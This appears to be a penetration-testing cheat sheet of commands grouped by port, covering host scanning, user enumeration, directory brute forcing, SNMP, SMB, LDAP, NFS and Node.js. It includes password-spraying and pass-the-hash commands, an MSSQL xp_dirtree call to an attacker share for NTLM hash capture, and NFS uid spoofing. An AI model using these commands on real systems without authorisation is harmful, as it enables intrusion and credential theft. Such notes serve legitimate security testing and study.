Host Discovery

Portscanner – NMAP:
##To save some time first run a simple SYN-Scan (half-open) to find open ports. Afterwards do a thorough scan with -sV -sC on the identified open ports. Optional pass a list of open ports to parameter -p.
> nmap -p- -T4 -oA allports
> nmap -p22,80,445 -sC -sV  -T4 -oA fullscan
> nmap -sU -oA udpscan

##Grab all ports off an -p- Nmap scan and send them to a file called ports
##Print them all in one line for better copy&paste to specify ports in thorough scan
> cat allports.nmap | grep ^[0-9] | awk -F/ ‘{print$1}’ | sort -u > ports
> for i in $(cat ports); do echo -n $i,;  done

Screenshot websites:

##For a quicker enumeration on large networks – Take a screenshot of every web server to quickly find the juicy stuff (LINK).
> cat hosts.txt | aquatone
> firefox aquatone_report.html

Enumerate Users over RCP:
## For Windows use impackets (LINK)
>python3 ‘username:password’@
##Or use RCPClient
> rpcclient ‘username%password’
##From here Tab for listing all commands
RPCClient> lookupnames administrator
##Lookup SIDS. Replace XXXX with an number >= 500 for administrative accounts or >= 1000 for normal user accounts
RPCClient> lookupsids S1-5*****-XXXX
## For Linux use enum4linux
## enum4linux is compatible for Windows aswell
> enum4linux -a



21 – FTP

Use Find on FTP:
##The default ftp does not support the “find” command. Use LFTP instead.
> lftp user@host
> lftp find . | grep “config”

Display hidden directories & files with LFTP:
> vim /etc/lftp.conf
> set ftp:list-options -a

53 – DNS

DSN zone transfer:
> dig axfr @

80, 443 – HTTP / HTTPS

Find Hidden Directories:
##Gobuster will start the search for subdirectories on the end of the value for -u. To find subdirectories with Gobuster on a given directory other than the root directory for example on /admin/(here) you have to pass -u
> gobuster -u -w wordlists.txt  [-s statuscodes]
##WFUZZ will start fuzzing the part of the directory where it finds “FUZZ” inside the value for -u. With the –hX parameter you can specify which responses should be ignored. For example –hh 123 ignores all responses with a length of 123 characters.
> wfuzz -u -w /wordlists/list.txt [ –hc / hl / hw / hh]

Live-Login Dictionary attack (PW-Sparying):
##Use Burp to intercept one login attempt to get the content for the post-data (-d) and –hw to ignore failed logins
> wfuzz -c –hw 42 -w wordlist.txt -d ‘username=admin&password=FUZZ&submit=login’

Web server vulnerability scanner:
> nikto -host

Specific WebApp-Scanners:
> wpscan –url
> joomscan -u


161 UDP – SNMP

Get Community String via dictionary:
##You can find a link to download Seclist on the “Helpful Links” section.
> onesixtyone -c /Seclist/Descovery/SNMP/common-snmp-community-strings.txt

Read out SNMP-Data:
##-c equals Community String which is most likely to be “public”. -v2c or -v1 is depending on the SNMP version. To read the output with snmp-mibs make sure to use “apt install snmp-mibs-downloader” comment out “mibs :” inside /etc/snmp/snmp.conf
> snmpwalk -c public -v2c


139 / 445 – SMB

List SMB-Shares and access a specific share:
> smbclient -L
> smbclient \\\\\\share-name

Mount a SMB-share to any destination (e.g. /mnt):
##Make sure that destination is not already mounted – unmount first
## use empty password for mounting for null authentication
> umount /mnt
> mount -t cifs ‘// name’  /mnt


Unauthenticated list all content off a SMB-Share:
##Use -d as localhost or the actual domain or leave empty – depending on error message
> smbmap -H -u anonymous -d localhost


Connect to SMB-Share via pass-the.hash and list all content:
> smbmap -u username -p ‘NTLMHASH:NTLMHASH’ -H -R

Print all privileges after mounting – execute inside mountpoint (inside /mnt for previous example):
> for i in $(ls); do echo $i; smbcacls -N ‘// name’ $i; done


389 – LDAP

Pull information like Naming Context, Distinguished Names and Domain Components:
> nmap -p 389 –script ldap-rootdse -Pn
> nmap -p 389 –script ldap-search -Pn
> ldapsearch -x -h -s base namingcontexts

With the information from above Nmap output use Ldapsearch:
> ldapsearch -x -h -s base -b ‘dc=Nmap output,dc=Nmap output’
> ldapsearch -x -h -s sub -b ‘dc=Nmap output,dc=Nmap output’
> ldapsearch -x -h -b ‘dc=Nmap output,dc=Nmap output’

Pull data with authenticated user:
## Use Distinguished-Name with -D
> ldapsearch -x -h -D “CN=User,OU=..,DC=..,DC=…” -W


1433 MS-SQL

Connect to MSSQL database via impackets (LINK):
> username@  -windows-auth

Connect from MSSQL server over impackets shell to SMB-Share to capture hash (responder needs to be  listening):
> xp_dirtree “\\\offensiveShare\”


2049 – NFS Network File System

##Make sure to apt install nfs-common
> showmount -e
##Try to use version 2 because it has no authentication. Client is responsible for authorization.  When receiving a “permission denied” the client must provide the permission.  So check the uid (ls -alh) and set the uid to one of your local users.
>mount -t nfs vers=2 /mnt/point
##Example: ls -alh gives a share with ls -alh uid = 1002. Create a new local user “useradd offensive”   and edit that users uid in /etc/passwd to offensive:x:1002:2004::/home/offensive:/bin/sh


3000 – Node.js

##Try to authenticate against Node.js using HTTP-Authentication
curl http://username:password@

##Try to authenticate against Node.js using HTTP-Authentication (might have to guess correct parameters)
curl -XPOST -d ‘user=admin&password=admin’
curl -XPOST -d ‘username=admin&password=admin’

##Decode token to get information – for example if it is an JWT token
##Using token inside Header (depending on token – JWT in this case)
curl -H ‘Authorization: Bearer insert_token_here’